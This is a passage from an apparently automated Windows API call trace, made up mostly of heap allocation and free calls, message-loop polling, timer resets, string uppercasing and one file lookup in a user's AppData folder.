Size=0x1) returned 0x2a71b58 [0113.343] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0113.343] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0113.343] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0113.343] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0113.343] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a719a8 [0113.343] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0113.343] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0113.343] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0113.343] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9058 [0113.344] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0113.344] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0113.344] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b28 [0113.344] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0113.344] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0113.344] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0113.344] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0113.344] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0113.344] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0113.344] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719e8 [0113.344] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0113.344] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0113.344] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0113.344] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0113.344] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0113.344] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0113.344] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a58 [0113.344] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0113.344] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0113.344] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0113.344] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0113.344] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0113.344] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0113.344] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0113.344] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0113.344] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0113.344] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0113.344] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0113.344] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0113.344] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0113.345] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0113.345] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0113.345] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0113.345] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0113.345] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0113.345] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0113.345] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719d8 [0113.345] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0113.345] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0113.345] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77bc0 | out: hHeap=0x2af0000) returned 1 [0113.345] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0113.345] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0113.345] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0113.345] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0113.345] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0113.345] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0113.345] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0113.345] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0113.345] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0113.345] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0113.345] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0113.345] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0113.345] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0113.345] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0113.345] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0113.345] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0113.345] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719c8 [0113.345] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0113.345] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0113.345] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a18 [0113.346] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0113.346] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f08 [0113.346] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0113.346] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0113.346] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0113.346] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0113.346] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0113.346] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ae8 [0113.346] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0113.346] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0113.346] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a68 [0113.346] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0113.346] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0113.346] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0113.346] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0113.346] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77df0 | out: hHeap=0x2af0000) returned 1 [0113.346] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0113.346] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0113.346] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0113.346] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0113.346] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0113.346] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0113.346] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0113.346] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0113.346] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0113.346] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ab8 [0113.346] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0113.346] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0113.346] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719d8 [0113.347] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0113.347] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0113.347] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0113.347] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0113.347] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0113.347] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0113.347] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0113.347] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0113.347] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0113.347] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa078 [0113.347] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0113.347] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa078 | out: hHeap=0x2af0000) returned 1 [0113.347] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0113.347] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0113.347] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0113.347] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0113.347] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0113.347] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0113.347] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0113.348] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0113.348] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719f8 [0113.348] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77eb8 [0113.348] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0113.348] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a08 [0113.348] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0113.348] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0113.348] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0113.348] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0113.348] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0113.348] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0113.348] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0113.348] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0113.348] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0113.348] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0113.348] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77dc8 | out: hHeap=0x2af0000) returned 1 [0113.348] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0113.348] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0113.348] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0113.348] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719f8 [0113.348] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0113.348] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0113.348] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0113.348] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fd0 [0113.348] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0113.348] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0113.348] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa168 [0113.348] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a28 [0113.348] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa168 | out: hHeap=0x2af0000) returned 1 [0113.349] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f30 [0113.349] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0f0 [0113.349] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa198 [0113.349] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b20 | out: hHeap=0x2af0000) returned 1 [0113.349] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0113.349] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0113.349] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0113.349] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0113.349] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0113.349] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0113.349] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0113.349] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0113.349] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f40 [0113.349] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ad8 [0113.349] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0113.349] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f58 [0113.349] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719f8 [0113.349] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f58 | out: hHeap=0x2af0000) returned 1 [0113.349] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0113.349] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1f8 [0113.349] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1b0 [0113.349] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0113.349] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0113.349] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0113.349] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa078 [0113.349] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0113.349] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1c8 [0113.349] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0113.349] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/5sRVNiax4.mp4", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77be1430, ftCreationTime.dwHighDateTime=0x1d5ca39, ftLastAccessTime.dwLowDateTime=0xfbe1e9a0, ftLastAccessTime.dwHighDateTime=0x1d5d1da, ftLastWriteTime.dwLowDateTime=0xfbe1e9a0, ftLastWriteTime.dwHighDateTime=0x1d5d1da, nFileSizeHigh=0x0, nFileSizeLow=0x161dc, dwReserved0=0x0, dwReserved1=0x0, cFileName="5sRVNiax4.mp4", cAlternateFileName="5SRVNI~1.MP4")) returned 0x9a4a00 [0113.350] FindClose (in: hFindFile=0x9a4a00 | out: hFindFile=0x9a4a00) returned 1 [0113.350] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1c8 | out: hHeap=0x2af0000) returned 1 [0113.350] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa078 | out: hHeap=0x2af0000) returned 1 [0113.350] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0113.350] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0113.350] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f40 | out: hHeap=0x2af0000) returned 1 [0113.350] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0113.350] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1b0 | out: hHeap=0x2af0000) returned 1 [0113.350] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f58 | out: hHeap=0x2af0000) returned 1 [0113.350] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0113.350] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0113.400] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa228 [0113.400] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0113.400] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa228 | out: hHeap=0x2af0000) returned 1 [0113.400] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0113.400] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa150 [0113.400] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fa0 [0113.400] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ac8 [0113.400] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0113.400] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f88 [0113.400] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a48 [0113.400] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f88 | out: hHeap=0x2af0000) returned 1 [0113.400] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0113.400] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa090 [0113.400] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa180 [0113.400] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0113.400] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa150 | out: hHeap=0x2af0000) returned 1 [0113.400] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1b0 [0113.400] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f40 [0113.400] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0113.400] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0c0 [0113.400] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0113.400] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0c0 | out: hHeap=0x2af0000) returned 1 [0113.400] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f40 | out: hHeap=0x2af0000) returned 1 [0113.400] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1b0 | out: hHeap=0x2af0000) returned 1 [0113.400] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0113.400] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fa0 | out: hHeap=0x2af0000) returned 1 [0113.401] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0113.401] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa180 | out: hHeap=0x2af0000) returned 1 [0113.401] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d50 | out: hHeap=0x2af0000) returned 1 [0113.401] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0113.401] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 1 [0113.401] TranslateMessage (lpMsg=0x8cf708) returned 0 [0113.401] DispatchMessageW (lpMsg=0x8cf708) returned 0x0 [0113.401] KillTimer (hWnd=0xa02be, uIDEvent=0x1) returned 1 [0113.401] SetTimer (hWnd=0xa02be, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0113.401] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0113.401] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0113.401] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a88 [0113.401] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0113.401] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e68 | out: hHeap=0x2af0000) returned 1 [0113.401] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0113.401] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0113.401] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0113.401] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0113.401] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d50 | out: hHeap=0x2af0000) returned 1 [0113.401] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0113.401] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa120 | out: hHeap=0x2af0000) returned 